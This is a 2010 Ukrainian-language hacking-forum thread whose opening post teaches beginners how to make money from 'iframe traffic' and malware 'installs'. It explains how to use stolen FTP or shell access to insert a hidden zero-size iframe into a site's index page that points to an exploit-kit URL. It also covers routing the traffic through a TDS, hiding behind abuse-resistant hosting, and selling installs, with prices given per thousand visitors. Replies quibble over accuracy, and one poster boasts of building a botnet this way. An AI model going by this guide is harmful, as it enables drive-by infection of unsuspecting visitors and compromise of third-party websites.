HackUA - Взлом та безпека веб додатків

[ PlohihZagRusOK.net - поганих завантажень немає ] [ LoadsSell.net - Ми продаємо завантаження ]
Старий 16.02.2010, 21:18
mandalina
Гарант форуму

Дописів: 258
Провів на форумі:
2 тиж 6 дн 4 год
Надіслати повідомлення для mandalina на ICQ
Post Iframe Трафік

[Iframe Трафік]

Хочу сказати відразу, стаття розрахована на новачків, ті хто знає що таке трафік і завантаження можу не читати, у статті розмова піде саме про це! Строго не судіть ...

Intro

У цій статті я розкажу про Iframe Трафік, що ж таке трафік?
[Посилання заблоковане: Зареєструйтесь!]
-У сленгу
вебмастеров і пошукових оптимізаторів - кількість відвідувачів, що прийшли на веб-сайт або [Посилання заблоковане: Зареєструйтесь!]

Трафік поділяється на країни,[Посилання заблоковане: Зареєструйтесь!]
ви зможете побачити скорочення всіх країн ... Так само існує Мікс трафф, Мікс трафф це трафік декількох країн зразу.

Для чого потрібен трафік?
В основному iframe трафік використовують для завантажень (що таке Iframe я розкажу пізніше).
А що таке завантаження? Завантаження це вже інша тема, про завантаження я розкажу пізніше!
Ще трафік можна продавати.

Де взяти трафік?

Звичайно ж трафік можна купити, але для чого? Його можна добути самому і продовать або використовувати для завантажень.
Ще трафік можна брати з зломаних сайтів, дорвеїв, спам розсилок ...
Щоб мати трафік нам потрібні фтп і шелли різних сайтів!

Для чого мені потрібні FTP і Shell і що мені з ними робити?

Настала пора розповісти про iframe!
Iframe-це фрейм в середині сторінки. За допомогою Iframe ми можемо вставити 1 html документ в інший! Просто кажучи iframe це код який треба вписати в сторінку сайту, щоб отримувати трафф!Наприклад ми вставили свій iframe в index сайту [Посилання заблоковане: Зареєструйтесь!]
і при заході на сайт користувач буде заходити одночасно на наш сайт, не відаючи того!
От і сам iframe який потрібно вставити в код сайту з якого хочемо отримувати трафік:

Код:
  <iframe src="http://site.ru/sploit.php" width="0" height="0" frameborder="0"> </ iframe>
Розберемо сам iframe:

це сайт на який користувачі site.ru будуть заходити паралельно
width = "0" довжина дорівнює 0
height = "0" висота дорівнює 0
frameborder = "0" межа фрейма дорівнює 0

Що робити з Iframe?

Що таке iframe ми розібрали, тепер розглянемо що з ним робити!
Беремо FTP або Shell будь-якого сайту, заходимо в дерікторію сайту і редагуємо головну сторінку, в основному це index.html (php).
І в сторінку на вставляємо Iframe, не забуваємо після цього зберегти сторінку!

Що потрібно для продажу трафіку?

Є така штука як TDS-Traffic Direct System.
TDS (Traffic Directing System) - це система управління трафіком, загалом, така хрень, за допомогою якої розподіляється трафік, фільтрується, ведеться статистика і т.д. Якщо у тебе виникає питання "а нахера вона потрібна, у мене траффа мало і фільтрувати його мені не потрібно", то відповідаю. Наприклад, ти лив траф на кодеки або шоп партнерки, а вони в новинах сьогодні написали, що змінюють домен. Що, будеш міняти на всіх дорах редірект?! А коли знову змінять домен, знову переробляти дори? Краще в такому випадку перенаправляти весь траф на TDS, а от-туди відправляти на партнерку. Чи тобі захочеться спробувати лити траф на іншу партнерку, або навіть просто на інший фід теперішньої. Загалом, якщо починаєте займатися видобутком трафіку, то про ТДС слід подбати в першу чергу.
Сильно вглублюватися про TDS я не буду!

Ще хочу дати не велику раду з приводу хостингу на який ви будете лити свій трафік!
Купуйте лише абузоустойчивий хостинг, тому що адміни сайтів можуть запідозрити не ладне і знайти ваш iframe і будуть скаржитися вашому хостеру, тому краще купувати абузоустойчивий хостинг!
Ну от і все, а нижче я розкажу про завантаження!

[Завантаження]

Intro

Що ж таке ці завантаження?
Завантаження-це завантаження й запуск файлу на комп'ютері жертви, це один з найпоширеніших методів розповсюдження шкідливих файлів!
Завантаження можна робити за допомогою ботнету і зв'язки сплоітов!
У цій статті я буду розповідати про завантаження за допомогою зв'язки сплоітов ...
Завантаження це дуже прибуткова справа, найбільше цінуються завантаження наступних країн: AU, UK, IT, NZ, ES, US

Що нам потрібно для того, щоб робити завантаження?

Нам потрібен Трафік, Зв'язка Сплоїтів, Абузоустойчовий хостинг
Припустим що у нас є 5к трафіку, це не означає що це у нас буде 5к завантажень, кількість завантажень залежить від пробива нашої зв'язки, якщо пробив у зв'язки 20% значить у нас буде 1к завантажень.
Тепер про зв'язку сплоітов!
Exploit-це скрипт, який дозволить нам виконати дії на машині жертви, через уразливість в будь-якій програмі (частіше за все в браузері).
А зв'язка сплоітов це кілька сплоітов пов'язаних в один скрипт!
Що ж таке пробивши зв'язки? - Це відсоток завантажень з 1к трафіку. Пробив залежить не тільки від зв'язки, але і від трафіку!
Я не буду давати посилання на зв'язки, тому що можу викласти тільки паблік зв'язки, а на даний момент всі паблік зв'язки палятся антивірусами! Краще всього брати приват зв'язки, з гарним пробивом і не палять антивіруси!

Як робити завантаження?

Наприклад наша зв'язка знаходиться за адресою [Посилання заблоковане: Зареєструйтесь!]

Значить нам треба лити трафік на цю адресу і тоді у вас будуть завантаження!
Ну ось ніби і все ...
Ну думаю ви вже зрозуміли, для не понятлевих поясню!

(c)[ DezzteR ]
Старий 08.03.2010, 15:29
morfie
Новачок

Дописів: 67
Провів на форумі:
2 дн 17 год 38 хв
Типово

хороша стаття mandalina +

цікаво скільки коштує 1кб трафіку
morfie зараз поза форумом   Відповісти з цитуванням
Старий 08.03.2010, 17:05
ZEXEL
Адміністратор

Дописів: 208
Провів на форумі:
1 міс 0 тиж 1 дн
Типово

Цитата:
хороша стаття mandalina +

цікаво скільки коштує 1кб трафіку
Як можна вивірювати ціну iframe трафіку в кілобайтах ?
Наразі середня ціна 1000 унікальних користувачів коштує від 1$ до 10$.
Все залежить від країни, та якості сплойту.

Є різні сервіси завантажень ваших файлів, наприклад на цьому сайті можеш подивитися ціни по країнам installs4sale.net
ZEXEL зараз поза форумом   Відповісти з цитуванням
Старий 08.03.2010, 22:56
mailbrush
:)

Дописів: 202
Провів на форумі:
9 г 27 хв 18 сек.
Надіслати повідомлення для mailbrush на ICQ
Типово

Прочитав статтю повність, ІМХО, повна фігня...
Мало того, що інформація некорректна, то ще й орфографія НА НУЛЮ!

ТС, якщо не розумієшся в цій темі - краще не пиши та не копіпасти, а тим більше провіряй на помилки після Google Translate.

PS: Яке відношення має ця стаття до Black SEO? При IFRAME'і на сплоіт сайт випадає з індексу ПС через декілька апів...
mailbrush зараз поза форумом   Відповісти з цитуванням
Старий 08.03.2010, 23:21
morfie
Новачок

Провів на форумі:
2 дн 17 год 38 хв
Типово

Цитата:
Допис від mailbrush [Посилання заблоковане: Зареєструйтесь!]

ТС, якщо не розумієшся в цій темі - краще не пиши та не копіпасти, а тим більше провіряй на помилки після Google Translate.

PS: Яке відношення має ця стаття до Black SEO? При IFRAME'і на сплоіт сайт випадає з індексу ПС через декілька апів...
напиши коректну
Старий 09.03.2010, 14:03
mandalina
Гарант форуму

Провів на форумі:
2 тиж 6 дн 4 год
Типово

Цитата:
Допис від mailbrush [Посилання заблоковане: Зареєструйтесь!]

Стаття написана для новачків,орфографію я виправив.

Р.S:Можливо це з імовірних причин випаду з індексу.

Старий 09.03.2010, 16:48
mailbrush
:)

Дописів: 202
Провів на форумі:
9 г 27 хв 18 сек.
Надіслати повідомлення для mailbrush на ICQ
Типово

Цитата:
Допис від morfie [Посилання заблоковане: Зареєструйтесь!]
напиши коректну
LOL :)

Цитата:
Допис від mandalina [Посилання заблоковане: Зареєструйтесь!]
Стаття написана для новачків,орфографію я виправив.
Цитата:
продовать, зломаних, "не велику раду", абузоустойчивий, дерікторію, "не ладне", "Що ж таке пробивши зв'язки?", сплоітов, понятлевих
Це стосовно помилок. Тепер про статтю. Допустимо, я - новачок. Читаю собі статтю.

Цитата:
Трафік-У сленгу вебмастеров і пошукових оптимізаторів - кількість відвідувачів, що прийшли на веб-сайт або дорвей.
...
...
...
Просто кажучи iframe це код який треба вписати в сторінку сайту, щоб отримувати трафф!
Ага, я вставлю іфрейм на свій сайт, і в мене буде багато відвідувачів на сайті?

Перш за все, треба було сказати, що iframe - HTML-тег, який вставляє фрейм в сторінку, тобто дозволяє завантажувати сторінку в сторінці з певними розмірами (вказаною шириною та висотою).

Цитата:
Наприклад ми вставили свій iframe в index сайту [Посилання заблоковане: Зареєструйтесь!]
і при заході на сайт користувач буде заходити одночасно на наш сайт, не відаючи того!
Цитата:
http://site.ru/sploit.php це сайт на який користувачі site.ru будуть заходити паралельно
Користувач не буде заходити паралельно на цю сторінку! Це браузер буде завантажувати її.

Цитата:
найбільше цінуються завантаження наступних країн: AU, UK, IT, NZ, ES, US
Цінуються абсолютно ВСІ країни! Тільки от кожний покупець купляє траф для своїх потребностей, відповідно країни підбирає для себе персонально. Тобто один покупець може купляти RU трафік за 10$/1к, а іншому він взагалі не потрібен.
mailbrush зараз поза форумом   Відповісти з цитуванням
Старий 09.03.2010, 17:03
mandalina
Гарант форуму

Провів на форумі:
2 тиж 6 дн 4 год
Типово

Дякую за доповнення mailbrush.+
Старий 09.03.2010, 19:26
morfie
Новачок

Провів на форумі:
2 дн 17 год 38 хв
Типово

Цитата:
Ага, я вставлю іфрейм на свій сайт, і в мене буде багато відвідувачів на сайті?

Перш за все, треба було сказати, що iframe - HTML-тег, який вставляє фрейм в сторінку, тобто дозволяє завантажувати сторінку в сторінці з певними розмірами (вказаною шириною та висотою).
це і новачку зрозуміло шо iframe - HTML-тег

Цитата:
Користувач не буде заходити паралельно на цю сторінку! Це браузер буде завантажувати її.
це тоже

Цитата:
Цінуються абсолютно ВСІ країни! Тільки от кожний покупець купляє траф для своїх потребностей, відповідно країни підбирає для себе персонально. Тобто один покупець може купляти RU трафік за 10$/1к, а іншому він взагалі не потрібен.
це єдине шо треба було дописати

Цитата:
LOL :)
шо за лол ?

і через ці дрібниці ти визнав статтю некоректною
+ орфографія не грає великої ролі , головне інфа
Старий 09.03.2010, 20:49
bloodAngel
Новачок

Дописів: 58
Провів на форумі:
3 дн 21 год 32 хв
Надіслати повідомлення для bloodAngel на ICQ Надіслати повідомлення для bloodAngel на Skype
Типово

morfie - зауваження mailbrush - а були доречні тому усе добре, а на рахунок статті - не в обіду і не хочу показати що я якись крутий - але я б її оцінив на 3 із 5 !! не в обіду mandalina !! але за написання само собою +
bloodAngel зараз на форумі   Відповісти з цитуванням
Старий 21.03.2010, 17:37
Desperate
Новачок

Дописів: 29
Провів на форумі:
6 г 13 хв 18 сек.
Типово

iframe - це велика річ! Я свого часу підняв великий ботнет завдяки айфрейму. На гроші з продажу цього ботнету я вчуся на п'ятому курсі)
Desperate зараз поза форумом   Відповісти з цитуванням
Відповідь

Параметри теми Пошук у цій темі
Пошук у цій темі:

Розширений пошук
Параметри перегляду

Ваші права у розділі
Ви не можете створювати нові теми
Ви не можете відповісти на повідомлення
Ви не можете додавати вкладення
Ви не можете редагувати Ваші повідомлення

BB code is Увімк.
Усмішки Увімк.
[IMG] код Увімк.
HTML код Вимк.

Швидкий перехід

Часовий пояс GMT +3. Поточний час: 09:53.